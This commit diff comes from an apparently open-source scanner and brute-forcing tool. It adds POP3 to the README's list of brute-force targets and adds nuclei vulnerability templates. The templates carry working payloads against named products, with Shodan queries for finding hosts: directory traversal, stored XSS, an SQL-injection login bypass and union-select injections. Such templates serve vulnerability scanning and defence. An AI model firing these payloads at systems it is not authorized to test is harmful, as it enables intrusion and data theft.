up PoCs;优化nuclei 参数控制 2022-08-02

README.md

@@ -20,7 +20,7 @@
   Code-level optimization, parameter optimization, and individual modules, such as vscan filefuzz, have been rewritten for these integrated projects.
   In principle, do not repeat the wheel, unless there are bugs, problems
 - Cross-platform: based on golang implementation, lightweight, highly customizable, open source, supports Linux, windows, mac os, etc.
-- Support [20] password blasting, support custom dictionary, open by "priorityNmap": true
+- Support [21] password blasting, support custom dictionary, open by "priorityNmap": true
   * RDP
   * SSH
   * rsh-spx
@@ -41,6 +41,7 @@
   * Tomcat
   * Jboss
   * Winrm(wsman)
+  * POP3
 - By default, http password intelligent blasting is enabled, and it will be automatically activated when an HTTP password is required, without manual intervention
 - Detect whether there is nmap in the system, and enable nmap for fast scanning through priorityNmap=true, which is enabled by default, and the optimized nmap parameters are faster than masscan
   Disadvantages of using nmap: Is the network bad, because the traffic network packet is too large, which may lead to incomplete results

README_CN.md

@@ -20,7 +20,7 @@ Vulnerabilities Scan；15000+PoC漏洞扫描；20种应用密码爆破；7000+We
   并对这些集成的项目进行代码级别优化、参数优化，个别模块,如 vscan filefuzz部分进行了重写  
   原则上不重复造轮子，除非存在bug、问题
 - 跨平台：基于golang实现，轻量级、高度可定制、开源，支持Linux、windows、mac os等
-- 支持【20】种密码爆破，支持自定义字典, 通过 "priorityNmap": true 开启 
+- 支持【21】种密码爆破，支持自定义字典, 通过 "priorityNmap": true 开启 
   * RDP
   * SSH
   * rsh-spx
@@ -41,6 +41,7 @@ Vulnerabilities Scan；15000+PoC漏洞扫描；20种应用密码爆破；7000+We
   * Tomcat
   * Jboss
   * Winrm(wsman)
+  * POP3
 - 默认开启http密码智能爆破，需要 HTTP 密码时才会自动启动，无需人工干预
 - 检测系统是否存在 nmap ，存在通过 priorityNmap=true 启用 nmap 进行快速扫描，默认开启，优化过的 nmap 参数比 masscan 快
   使用 nmap 的弊端：网络不好的是否，因为流量网络包过大可能会导致结果不全

config/nuclei-templates/cves/2019/CVE-2019-10717.yaml

@@ -0,0 +1,41 @@
+id: CVE-2019-10717
+
+info:
+  name: BlogEngine.NET 3.3.7.0 - Directory Traversal
+  author: arafatansari
+  severity: high
+  description: |
+    BlogEngine.NET 3.3.7.0 allows /api/filemanager Directory Traversal via the path parameter
+  reference:
+    - https://www.securitymetrics.com/blog/Blogenginenet-Directory-Traversal-Listing-Login-Page-Unvalidated-Redirect
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-10717
+    - /~https://github.com/rxtur/BlogEngine.NET/commits/master
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
+    cvss-score: 7.1
+    cve-id: CVE-2019-10717
+    cwe-id: CWE-22
+  metadata:
+    shodan-query: http.html:"Blogengine.net"
+    verified: "true"
+  tags: cve,cve2019,blogengine,lfi,traversal
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/filemanager?path=%2F..%2f..%2fContent"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - '~/App_Data/files/../../([a-zA-Z0-9\.\-]+)/([a-z0-9]+)'
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2019/CVE-2019-11370.yaml

@@ -0,0 +1,43 @@
+id: CVE-2019-11370
+
+info:
+  name: Carel pCOWeb < B1.2.4 - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    Stored XSS was discovered in Carel pCOWeb prior to B1.2.4, as demonstrated by the config/pw_snmp.html "System contact" field.
+  reference:
+    - https://www.exploit-db.com/exploits/46897
+    - /~https://github.com/nepenthe0320/cve_poc/blob/master/CVE-2019-11370
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-11370
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 5.4
+    cve-id: CVE-2019-11370
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: http.html:"pCOWeb"
+    verified: "true"
+  tags: cve,cve2019,pcoweb,xss,carel
+
+requests:
+  - raw:
+      - |
+        POST /config/pw_snmp_done.html HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        %3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
+
+      - |
+        GET /config/pw_snmp.html HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body_2, "text/html")'
+          - status_code_2 == 200
+          - contains(body_2, 'value=\"\"><script>alert(document.domain)</script>\"></td>')
+        condition: and

config/nuclei-templates/cves/2022/CVE-2022-32022.yaml

@@ -0,0 +1,49 @@
+id: CVE-2022-32022
+
+info:
+  name: Car Rental Management System v1.0 - SQL Injection
+  author: arafatansari
+  severity: high
+  description: |
+    Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/ajax.php?action=login.
+  reference:
+    - /~https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-1.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-32022
+    - /~https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-1.md.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.2
+    cve-id: CVE-2022-32022
+    cwe-id: CWE-89
+  metadata:
+    shodan-query: http.html:"Car Rental Management System"
+    verified: "true"
+  tags: cve,cve2022,carrental,cms,sqli,login-bypass
+
+requests:
+  - raw:
+      - |
+        POST /admin/ajax.php?action=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username=admin'+or+'1'%3D'1'%23&password=admin
+
+      - |
+        GET /admin/index.php?page=home HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Welcome back Administrator!'
+          - 'action=logout'
+          - 'Manage Account'
+        condition: and
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2022/CVE-2022-32024.yaml

@@ -0,0 +1,50 @@
+id: CVE-2022-32024
+
+info:
+  name: Car Rental Management System v1.0 - SQL Injection
+  author: arafatansari
+  severity: high
+  description: |
+    Car Rental Management System v1.0 is vulnerable to SQL Injection via /booking.php?car_id=.
+  reference:
+    - /~https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-4.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-32024
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.2
+    cve-id: CVE-2022-32024
+    cwe-id: CWE-89
+  metadata:
+    comment: Login bypass is also possible using the payload-  admin'+or+'1'%3D'1' in username.
+    shodan-query: http.html:"Car Rental Management System"
+    verified: "true"
+  tags: cve,cve2022,carrental,cms,sqli,authenticated
+
+variables:
+  num: "999999999"
+
+requests:
+  - raw:
+      - |
+        POST /admin/ajax.php?action=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}&password={{password}}
+
+      - |
+        GET /booking.php?car_id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1
+        Host: {{Hostname}}
+
+    skip-variables-check: true
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5({{num}})}}'
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2022/CVE-2022-32025.yaml

@@ -0,0 +1,52 @@
+id: CVE-2022-32025
+
+info:
+  name: Car Rental Management System v1.0 - SQL Injection
+  author: arafatansari
+  severity: high
+  description: |
+    Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/view_car.php?id=.
+  reference:
+    - /~https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-6.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-32025
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.2
+    cve-id: CVE-2022-32025
+    cwe-id: CWE-89
+  metadata:
+    comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.
+    shodan-query: http.html:"Car Rental Management System"
+    verified: "true"
+  tags: cve,cve2022,carrental,cms,sqli,authenticated
+
+variables:
+  num: "999999999"
+
+requests:
+  - raw:
+      - |
+        POST /admin/ajax.php?action=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}%23&password={{password}}
+
+      - |
+        GET /admin/view_car.php?id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1
+        Host: {{Hostname}}
+
+    skip-variables-check: true
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5({{num}})}}'
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2022/CVE-2022-32026.yaml

@@ -0,0 +1,53 @@
+id: CVE-2022-32026
+
+info:
+  name: Car Rental Management System v1.0 - SQL Injection
+  author: arafatansari
+  severity: high
+  description: |
+    Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/manage_user.php?id=.
+  reference:
+    - /~https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-32028
+    - /~https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-5.md
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.2
+    cve-id: CVE-2022-32028
+    cwe-id: CWE-89
+  metadata:
+    comment: Login bypass is also possible using the payload-  admin'+or+'1'%3D'1' in username.
+    shodan-query: http.html:"Car Rental Management System"
+    verified: "true"
+  tags: cve,cve2022,carrental,cms,sqli,authenticated
+
+variables:
+  num: "999999999"
+
+requests:
+  - raw:
+      - |
+        POST /admin/ajax.php?action=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}&password={{password}}
+
+      - |
+        GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1
+        Host: {{Hostname}}
+
+    skip-variables-check: true
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5({{num}})}}'
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2022/CVE-2022-32028.yaml

@@ -0,0 +1,52 @@
+id: CVE-2022-32028
+
+info:
+  name: Car Rental Management System v1.0 - SQL Injection
+  author: arafatansari
+  severity: high
+  description: |
+    Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/manage_user.php?id=.
+  reference:
+    - /~https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-32028
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.2
+    cve-id: CVE-2022-32028
+    cwe-id: CWE-89
+  metadata:
+    comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.
+    shodan-query: http.html:"Car Rental Management System"
+    verified: "true"
+  tags: cve,cve2022,carrental,cms,sqli,authenticated
+
+variables:
+  num: "999999999"
+
+requests:
+  - raw:
+      - |
+        POST /admin/ajax.php?action=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}&password={{password}}
+
+      - |
+        GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1
+        Host: {{Hostname}}
+
+    skip-variables-check: true
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5({{num}})}}'
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2022/CVE-2022-34046.yaml

@@ -9,6 +9,7 @@ info:
   reference:
     - https://drive.google.com/file/d/18ECQEqZ296LDzZ0wErgqnNfen1jCn0mG/view?usp=sharing
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34046
+    - http://packetstormsecurity.com/files/167890/Wavlink-WN533A8-Password-Disclosure.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5

config/nuclei-templates/cves/2022/CVE-2022-34047.yaml

@@ -9,6 +9,7 @@ info:
   reference:
     - https://drive.google.com/file/d/1sTQdUc12aZvJRFeb5wp8AfPdUEkkU9Sy/view?usp=sharing
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34047
+    - http://packetstormsecurity.com/files/167891/Wavlink-WN530HG4-Password-Disclosure.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5